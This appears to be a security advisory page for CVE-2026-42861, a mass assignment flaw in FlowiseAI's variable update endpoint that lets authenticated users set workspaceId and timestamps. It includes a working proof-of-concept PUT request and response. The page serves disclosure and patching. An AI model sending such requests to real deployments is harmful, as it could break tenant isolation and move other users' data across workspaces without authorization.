GHSA-6FW7-3Q8R-M5VJ

Vulnerability from github – Published: 2026-05-14 14:52 – Updated: 2026-06-09 13:09
VLAI
Summary
FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment
Details

Summary

A Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.

The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.

Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.

This behavior may break tenant isolation in multi-workspace environments.

Details

The endpoint responsible for updating variables:

PUT /api/v1/variables/{variableId}

accepts a JSON request body containing the variable definition.

However, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.

Server-controlled fields that can be manipulated include:

  • workspaceId
  • createdDate
  • updatedDate

These fields appear to be directly mapped to the database entity without strict input validation or authorization checks.

For example, the following request body was accepted by the server:

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

The server accepted the attacker-controlled workspaceId and metadata fields and persisted them.

PoC

Request

PUT /api/v1/variables/<VARIABLE_ID>
Content-Type: application/json

{
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2016-03-06T18:00:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Response

{
  "id": "0a2b9f61-4a97-4ff8-b80d-00275ed18674",
  "name": "aaa",
  "value": "bbbe",
  "type": "static",
  "createdDate": "2016-03-06T17:59:30.000Z",
  "updatedDate": "2026-03-06T18:05:17.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

This confirms that the backend accepts and persists attacker-controlled internal properties.

Impact

This vulnerability allows authenticated users to manipulate internal attributes of variable resources.

Possible impacts include:

  1. Cross-workspace reassignment of variables (workspaceId)
  2. Unauthorized modification of metadata (createdDate, updatedDate)
  3. Potential tenant isolation bypass in multi-workspace deployments

In multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.

Severity
7.6 (High)
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42861"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-639",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T14:52:24Z",
    "nvd_published_at": "2026-06-08T16:16:39Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.\n\nThe endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.\n\nDue to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.\n\nThis behavior may break tenant isolation in multi-workspace environments.\n\n### Details\nThe endpoint responsible for updating variables:\n\n**PUT /api/v1/variables/{variableId}**\n\naccepts a JSON request body containing the variable definition.\n\nHowever, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.\n\nServer-controlled fields that can be manipulated include:\n\n- workspaceId\n- createdDate\n- updatedDate\n\nThese fields appear to be directly mapped to the database entity without strict input validation or authorization checks.\n\nFor example, the following request body was accepted by the server:\n\n```json\n{\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2016-03-06T18:00:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\nThe server accepted the attacker-controlled workspaceId and metadata fields and persisted them.\n\n### PoC\n**Request**\n\n```http\nPUT /api/v1/variables/\u003cVARIABLE_ID\u003e\nContent-Type: application/json\n\n{\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2016-03-06T18:00:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\n**Response**\n\n```json\n{\n  \"id\": \"0a2b9f61-4a97-4ff8-b80d-00275ed18674\",\n  \"name\": \"aaa\",\n  \"value\": \"bbbe\",\n  \"type\": \"static\",\n  \"createdDate\": \"2016-03-06T17:59:30.000Z\",\n  \"updatedDate\": \"2026-03-06T18:05:17.000Z\",\n  \"workspaceId\": \"11111111-2222-3333-4444-555555555555\"\n}\n```\n\nThis confirms that the backend accepts and persists attacker-controlled internal properties.\n\n### Impact\nThis vulnerability allows authenticated users to manipulate internal attributes of variable resources.\n\nPossible impacts include:\n\n1. Cross-workspace reassignment of variables (workspaceId)\n2. Unauthorized modification of metadata (createdDate, updatedDate)\n3. Potential tenant isolation bypass in multi-workspace deployments\n\nIn multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.",
  "id": "GHSA-6fw7-3q8r-m5vj",
  "modified": "2026-06-09T13:09:53Z",
  "published": "2026-05-14T14:52:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6fw7-3q8r-m5vj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42861"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FlowiseAI has Mass Assignment in Variable Update Endpoint that Allows Cross-Workspace Resource Reassignment"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.